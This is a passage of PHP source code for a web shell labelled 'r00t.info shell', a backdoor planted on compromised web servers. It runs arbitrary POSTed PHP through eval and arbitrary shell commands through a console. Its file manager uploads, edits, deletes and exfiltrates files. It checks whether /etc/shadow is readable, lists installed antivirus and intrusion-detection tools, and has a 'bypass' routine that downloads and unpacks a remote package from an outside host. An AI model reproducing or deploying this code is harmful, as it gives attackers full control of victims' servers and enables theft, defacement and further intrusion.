0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n elseif (!@is_writable($f)) return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n else return \'<font color=#00cd00><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'<h1>Server security information</h1><div class=content>\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'<span>\'.$n.\': </span>\';\r\n if(strpos($v, "\\n") === false) echo $v.\'<br>\';\r\n else echo \'<pre class=ml1>\'.$v.\'</pre>\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'<h1>PHP info</h1><div class=content>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'</div><br>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\\'\\\');\r\n}return false;\r\n"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\').\'margin-top:5px;\r\n" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'</pre></div>\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'<h1>File manager</h1><div class=content>\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'<script>document.mf.p1.value="";\r\ndocument.mf.p2.value="";\r\n</script>\';\r\n } $dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]);\r\n } echo \'<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\\'checkbox\\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\\'100%\\\' class=\\\'main\\\' cellspacing=\\\'0\\\' cellpadding=\\\'2\\\'>\r\n <form name=files method=post>\';\r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n } echo \'<tr><td colspan=5>\r\n <input type=hidden name=a value=\\\'FilesMan\\\'>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <select name=\\\'p1\\\'><option value=\\\'copy\\\'>Copy</option><option value=\\\'move\\\'>Move</option><option value=\\\'delete\\\'>Delete</option>\';\r\n if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){echo \'<option value=\\\'paste\\\'>Paste</option>\';\r\n } echo \'</select>&nbsp;\r\n<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" value="r00t.info shell" disabled="disabled"/>&nbsp;\r\n<input type="submit" value="Add Deface Here" disabled="disabled"></td></tr>\r\n </form></table></div>\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$i<strLen($p);\r\n$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));\r\n}return $r;\r\n}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= \'%\'.dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n if(function_exists($_POST[\'p1\'])) echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';\r\ndocument.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n $stringTools = array( \'Base64 encode\' => \'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n\'><select name=\'selectTool\'>";\r\n foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"</pre></div>";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</pre>\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;\r\ncolor:black;\r\n">\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,null,null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.text.value);\r\nreturn false;\r\n"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</textarea><input type=submit value=">>"></form>\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= \' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';\r\n} $h[1] .= \'<br>\';\r\n $h[2] .= "\\n";\r\n } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;\r\n"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.name.value);\r\nreturn false;\r\n"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'<script>g(null,null,null,null,"")</script>\');\r\n else { echo \'Fail!<script>document.mf.p3.value="";\r\n</script>\';\r\n } } else echo \'Bad time format!<script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array("");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push("");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>\';\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';\r\ndocument.cf.cmd.value=\\\'\\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n continue;\r\n } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) 